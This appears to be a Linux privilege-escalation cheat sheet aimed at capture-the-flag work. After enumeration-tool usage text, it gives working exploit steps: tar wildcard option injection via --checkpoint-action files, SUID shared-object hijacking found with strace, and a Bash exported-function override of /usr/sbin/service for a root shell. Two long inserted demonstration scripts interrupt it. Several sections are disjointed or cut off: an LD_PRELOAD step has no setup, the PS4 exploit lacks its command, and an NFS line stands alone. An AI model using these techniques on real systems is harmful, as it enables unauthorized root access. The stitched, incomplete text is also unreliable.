Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
OPTIONS:
-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-s Supply current user password to check sudo perms (INSECURE)
-r Enter report name
-h Displays this help text
Running with no options = limited scans/no output file
-e Requires the user to enter an output location,
i.e. /tmp/export. If this location does not exist, it will be created.
-r Requires the user to enter a report name.
The report (.txt file) will be saved to the current working directory.
-t Performs thorough (slow) tests.
Without this switch default 'quick' scans are performed.
-s Use the current user with supplied password to check for sudo permissions -
note this is insecure and only really for CTF use!
-k An optional switch for which the user can search for a single keyword
within many files (documented below).
Linux Smart Enumeration
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
LinPEAS
./linpeas.sh
Tar Wildcard
Condition
A script run by root (e.g. from cron) runs tar with an unquoted * at the end of the command
The directory in which that * is expanded (tar's working directory) is writable by the current user
Exploit
Reference:
Example:
TryHackMe: Skynet
If you see a root script running tar on a wildcard, you can smuggle tar options in through file names, and through those options a command. For example, root is running a cron job with the following script:
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
As you see, there is a wildcard at the end of the tar command: the shell expands * into the file names in /var/www/html, and tar treats any name that starts with -- as an option.
The exploit condition is having write permission on /var/www/html. If so, the steps to get a root reverse shell are:
Write a bash script (reverse shell command) and save it as /var/www/html/shell.sh
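The injection described above, as an added example that is not part of the original page, reproduced locally without root: it builds a scratch directory standing in for /var/www/html, drops a payload script plus the two option-named files, and runs the same tar command the cron job runs. The scratch directory, the marker file and the run_cron_tar helper are assumptions made for this demonstration; the "fixed" variant goes beyond the page and shows that archiving ./* instead of * defeats the trick, because every expanded name then starts with ./ and cannot be parsed as an option.

```shell
# Added example, not part of the original page: local reproduction of the
# tar wildcard injection. Requires GNU tar (bsdtar and busybox tar do not
# understand --checkpoint).
#
# $1 = "vulnerable" runs "tar cf backup.tgz *" exactly like the cron job;
#      "fixed"      runs "tar cf backup.tgz ./*" (hardened form).
# Returns 0 if the injected script ran, 1 otherwise.
run_cron_tar() {
    work=$(mktemp -d) || return 1          # stands in for /var/www/html
    marker="$work/injected.txt"

    # The payload the cron job will end up executing. In a real attack this is
    # the reverse shell; here it only writes a marker so the result is checkable.
    printf '#!/bin/sh\necho pwned > "%s"\n' "$marker" > "$work/shell.sh"

    # Two files whose names tar parses as options once the shell expands *:
    # --checkpoint=1 makes tar pause after every record it writes, and
    # --checkpoint-action=exec=... runs a command (via /bin/sh -c) at each pause.
    touch "$work/--checkpoint=1"
    touch "$work/--checkpoint-action=exec=sh shell.sh"

    # Same thing the root cron job does: cd into the directory and tar everything.
    case "$1" in
        vulnerable) ( cd "$work" && tar cf "$work.tgz" *   >/dev/null 2>&1 ) || true ;;
        fixed)      ( cd "$work" && tar cf "$work.tgz" ./* >/dev/null 2>&1 ) || true ;;
        *)          rm -rf "$work"; return 1 ;;
    esac

    if [ -f "$marker" ]; then rc=0; else rc=1; fi
    rm -rf "$work" "$work.tgz"
    return "$rc"
}
```

When the cron job really runs as root, the exec action runs shell.sh as root too; in the real case the payload is the reverse shell written in the step above, and the option-named files are created with touch exactly as here, in /var/www/html.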
Run one of the programs you are allowed to run via sudo (listed when running sudo -l) (apache2 as an example here), while setting the LD_PRELOAD environment variable to the full path of the new shared object:
exim-4.84-3 --> Search for exploit in exploit-db (CVE-2016-1531)
SUID / SGID - suid-so Shared Object Injection
Condition
suid-so has root SUID set
Exploit
First run:
/usr/local/bin/suid-so
Then run suid-so under strace and search the output for open/openat/access calls that fail with "No such file" (ENOENT), i.e. libraries the binary looks for but does not find:
user@debian:~/tools/sudo$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
Find a directory that is writable by the current user. For example:
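The triage step above, as an added example that is not part of the original page: it pulls every shared object that an open/openat/access call failed to find out of strace output, walks up from each missing path to the nearest directory that does exist, and reports whether the current user can write there (if the nearest existing ancestor is writable, the missing subdirectories can simply be created). The function names are assumptions; the sample strace lines are copied from the output shown above, except the last openat line, which is constructed to show the versioned-name and openat cases.

```shell
# Added example, not part of the original page: triage strace output for
# shared objects a SUID binary tries to load from a location we may control.

# Print (sorted, unique) every path in a failed open/openat/access call whose
# name looks like a shared object: libfoo.so, libfoo.so.1, libfoo.so.1.2 ...
find_missing_so() {
    grep -E 'open(at)?\(|access\(' |
    grep -E '\.so(\.[0-9]+)*"' |
    grep 'ENOENT' |
    sed -E 's/.*"([^"]*\.so(\.[0-9]+)*)".*/\1/' |
    sort -u
}

# Walk up from a (possibly non-existent) path to the first directory that
# exists, since that is where we would have to be able to create the rest.
first_existing_dir() {
    d=$(dirname -- "$1")
    while [ ! -d "$d" ]; do
        d=$(dirname -- "$d")
    done
    printf '%s\n' "$d"
}

# Read strace output on stdin, print: <missing .so> <existing ancestor> <writable|not-writable>
report_candidates() {
    find_missing_so | while IFS= read -r p; do
        d=$(first_existing_dir "$p")
        if [ -w "$d" ]; then s=writable; else s=not-writable; fi
        printf '%s %s %s\n' "$p" "$d" "$s"
    done
}

# Constructed sample: the first five lines are from the strace output above,
# the openat line is made up to exercise the versioned-name case.
SAMPLE_STRACE='access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/libdl.so.2", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/opt/app/lib/libhelper.so.1", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)'

# Run the report over the constructed sample.
demo() {
    printf '%s\n' "$SAMPLE_STRACE" | report_candidates
}

demo
```

Against a live target, feed it the real trace: strace -f -e trace=open,openat,access /usr/local/bin/suid-so 2>&1 | report_candidates. Note that the kernel does not honour the setuid bit for a ptraced process, so under strace the binary runs as you; that is fine for discovering its library search path, but the payload itself must be triggered by running the binary normally.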
SUID / SGID - Abuse Shell Features (Bash < 4.2-048)
Condition
Root SUID binary that executes another program by its absolute path (suid-env2 as an example here)
Bash < 4.2-048
Exploit
Check which program the binary executes with strings:
user@debian:~/tools/suid$ strings /usr/local/bin/suid-env2
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
/usr/sbin/service apache2 start
In Bash versions before 4.2-048 it is possible to define shell functions whose names resemble file paths, then export those functions so that they are used instead of the actual executable at that file path, even in a shell started by a SUID binary.
user@debian:~/tools/suid$ bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)
Then we can create a Bash function with the name /usr/sbin/service
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service
When running the SUID binary, we will get a root shell:
/usr/local/bin/suid-env2
SUID / SGID - Abuse Shell Features (Bash < 4.4)
Condition
Root SUID binary
Bash < 4.4
Exploit
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.
Run the SUID binary with bash debugging enabled (SHELLOPTS=xtrace in its environment) and the PS4 variable set to an embedded command substitution that creates an SUID copy of bash:
Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.